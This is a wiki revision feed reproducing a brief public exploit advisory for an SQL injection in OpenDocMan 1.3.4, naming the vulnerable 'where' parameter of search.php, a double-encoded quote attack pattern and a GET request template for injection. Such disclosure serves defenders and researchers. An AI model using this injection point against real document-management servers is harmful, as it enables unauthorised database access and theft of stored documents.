https://pwnwiki.com/index.php?action=history&feed=atom&title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E 2026-04-08T08:55:19Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=OpenDocMan_1.3.4_-_%27search.php_where%27_SQL_%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=2033&oldid=prev 2021-05-02T04:58:15Z

<p>Created page with &quot;==EXP== &lt;pre&gt; =========================================================================================== # Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection # CVE:...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> ===========================================================================================<br /> # Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection<br /> # CVE: N/A<br /> # Date: 05/03/2019<br /> # Exploit Author: Mehmet EMIROGLU<br /> # Vendor Homepage: https://sourceforge.net/projects/opendocman/files/<br /> # Software Link: https://sourceforge.net/projects/opendocman/files/<br /> # Version: v1.3.4<br /> # Category: Webapps<br /> # Tested on: Wamp64, @Win<br /> # Software description: OpenDocMan is a web based document management<br /> system (DMS) written in PHP designed<br /> to comply with ISO 17025 and OIE standard for document management.<br /> It features fine grained control of access to files, and automated<br /> install and upgrades.<br /> ===========================================================================================<br /> # POC - SQLi<br /> # Parameters : where<br /> # Attack Pattern : %2527<br /> # GET Request :<br /> http://localhost/opendocman/search.php?submit=submit&amp;sort_by=id&amp;where=[SQL Inject Here]&amp;sort_order=asc&amp;keyword=Training Manual&amp;exact_phrase=on<br /> ===========================================================================================<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki